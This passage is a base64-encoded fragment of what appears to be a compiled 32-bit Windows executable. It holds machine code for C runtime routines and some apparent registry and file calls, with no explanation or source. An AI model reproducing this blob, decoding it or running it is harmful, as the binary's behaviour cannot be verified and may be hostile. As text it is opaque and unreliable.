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
